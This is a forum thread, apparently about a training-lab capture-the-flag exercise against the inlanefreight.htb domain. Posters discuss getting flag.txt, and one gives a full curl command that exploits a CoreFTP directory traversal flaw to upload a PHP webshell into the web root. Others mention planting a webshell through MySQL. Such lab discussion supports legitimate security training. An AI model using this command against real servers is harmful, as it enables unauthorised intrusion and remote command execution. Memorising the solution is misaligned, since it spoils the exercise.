Attacking Common Services - Easy

( You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. )

ANYONE KNOW ABOUT THAT TOPIC? I uploaded webshell on site but only working two commands dir and whoami . Have anyone any references ?

1 Like

have you tried the command more?

thanks for response . I have already find answer :slight_smile:

This one was quite a mess. You see so many opportunities that your head spinning in every directions. After some time, i decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):

curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<password> -F 'fileX=@/path/to/wwwolf-php-webshell/webshell.php' 'https://IP/../../../../../..\xampp\htdocs\myshell.php'

After that its a breeze. just dir "\flag.txt" on drive root with webshell UI

enjoy

Would you be able to message me with more details of how you did this? how did you get a webshell to the \xampp\htdocs?

1 Like

I got the flag with some help from a friend. There are at least two ways to get the flag. One way, the way that I had help with from a friend, does not require a webshell or a php-reverse-shell.

Message me if you need help.

The post that @subrealz made is pretty much on the right track, but I could not figure it out from that post. Honestly, I probably would have never figured out the solution without some help.

John

I managed to get the flag with a webshell that I uploaded via sql… It was limited and messy but it did the job.

1 Like

I figured MySQL was the other path.